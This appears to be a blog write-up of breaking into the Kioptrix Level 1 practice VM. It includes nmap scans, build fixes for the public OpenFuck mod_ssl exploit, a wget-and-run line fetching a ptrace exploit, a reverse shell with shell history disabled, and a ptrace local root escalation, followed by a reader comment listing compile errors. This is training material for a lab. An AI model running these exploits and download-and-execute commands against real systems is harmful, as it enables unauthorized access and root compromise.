I started with loading the VM on the same network as my Kali Linux was. I started with a ping scan on the network, cause I didn't know what IP the VM got.
root@kali:~# nmap -P0 192.168.1.0/24
(...)
Nmap scan report for 192.168.1.104
Host is up (0.00051s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:02:82:DB (VMware)
(...)
After that I found the host I did a more exhaustive TCP SYN scan on the host.
root@kali:~# nmap -sS -A 192.168.1.104
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-02 20:04 CET
Nmap scan report for 192.168.1.104
Host is up (0.00048s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after: 2010-09-26T08:32:06+00:00
|_ssl-date: 2013-11-02T20:07:02+00:00; +1h01m50s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:02:82:DB (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.1.104
From the above list we can see that we have a bunch of pretty old services. I did a Google search for the Apache version, and came across the following exploit:
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)
http://www.exploit-db.com/exploits/764/
It was really promising. We had SSL service running as well. After downloading I had to add two lines to the exploit code in order to get it compiled + commented out a command, which was not needed.
#include <openssl/rc4.h>
#include <openssl/md5.h>
// wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
Once it compiled, I searched for the version I need and run it (we know the Apache version, and that the Linux is RedHat), and voila... I got a reverse shell, with limited privileges.
root@kali:~# ./OpenFuck | grep 1.3.20
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
root@kali:~# ./OpenFuck 0x6b 192.168.1.104
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp;
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ uname -r
uname -r
2.4.7-10
Now I only need to get root. The original exploit wanted to download a ptrace exploit. After checking the Linux kernel version, I could see that it could work, so I downloaded the code and compiled it.
Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit
http://www.exploit-db.com/exploits/3/
I had to modify one line in the exploit in order to get it work:
#include <linux/user.h>
to
#include <sys/user.h>
I copied it to my Apache directory and copied it to the victim machine with wget. After running it, I got root!
bash-2.05$ wget 192.168.1.17/p
wget 192.168.1.17/p
--15:42:35-- http://192.168.1.17/p
=> `p'
Connecting to 192.168.1.17:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 9,210
0K ........ 100% @ 691.86 KB/s
15:42:35 (691.86 KB/s) - `p' saved [9210/9210]
bash-2.05$ ls -l
ls -l
total 9
-rw-r--r-- 1 apache apache 9210 Nov 2 14:40 p
bash-2.05$ chmod 777 p
chmod 777 p
bash-2.05$ ./p
./p
[+] Attached to 5990
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -l
total 2
-rw-r--r-- 1 root root 1303 Sep 26 2009 anaconda-ks.cfg
This is only my way doing it, as this is the entry level, there could be other ways to get in.
1 comment:
I get these errors when I try to compile it. I have added the headers to it and everything but it seems like my amazing C experience isn't helping ^,^ ...
764.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
764.c: In function ‘read_ssl_packet’:
764.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
^~~~~~~~~~~~~
764.c:847:19: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘get_server_hello’:
764.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
if (*(p++) != SSL2_MT_SERVER_HELLO) {
^~~~~~~~~~~~~~~~~~~~
764.c: In function ‘send_client_master_key’:
764.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
if (pkey->type != EVP_PKEY_RSA) {
^~
764.c: In function ‘get_server_verify’:
764.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
^~~~~~~~~~~~~~~~~~~~~
764.c: In function ‘send_client_finished’:
764.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
buf[0] = SSL2_MT_CLIENT_FINISHED;
^~~~~~~~~~~~~~~~~~~~~~~
764.c: In function ‘get_server_finished’:
764.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
if (buf[0] != SSL2_MT_SERVER_FINISHED) {
Post a Comment